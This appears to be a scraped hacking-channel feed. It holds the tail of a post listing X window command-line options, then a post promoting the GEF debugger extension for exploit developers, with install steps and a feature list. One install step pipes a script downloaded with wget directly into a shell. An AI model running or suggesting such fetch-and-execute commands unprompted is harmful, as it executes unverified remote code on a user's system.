-bg color Setting the background color of the window
-display
system. server number

Using an X server with a given number (usually 0) on a given system
-fg color Setting the primary color of the window
-fn font Using the specified font
-font font Using the specified font
-foreground color
red green blue

Setting the primary color of the window
-foreground color Setting the primary color of the window
-geometry
width height + x + y

Set window size and location
-geometry widths height Setting window sizes
-geometry + x + y Setting the position of the upper left corner of the window
-height line Setting the window size vertically, in rows
-position x y Setting the position of the upper left corner of the window, in pixels
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated GEF - GDB Enhanced Features for exploit devs & reversers
>GEF (pronounced ʤɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands, or bringing out the relevant information from the debugging runtime.
> t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

# via the install script
1) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

# manually
2) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py

3) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
Then just start playing:

4) gdb -q /path/to/my/bin
gef➤ gef help

🦑Features :

A few of GEF features include:

> One single GDB script.

> Entirely OS Agnostic, NO dependencies: GEF is battery-included and is installable in 2 seconds (unlike PwnDBG).

> Fast limiting the number of dependencies and optimizing code to make the commands as fast as possible (unlike PwnDBG).

>Provides a great variety of commands to drastically change your experience in GDB.

>Easily extendable to create other commands by providing more comprehensible layout to GDB Python API.

>Works consistently on both Python2 and Python3.

>Built around an architecture abstraction layer, so all commands work in a ny GDB-supported architecture such as x86-32/64, ARMv5/6/7,
> AARCH64, SPARC, MIPS, PowerPC, etc. (unlike PEDA)

> Suited for real-life apps debugging, exploit development, just as much as CTF (unlike PEDA or PwnDBG

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁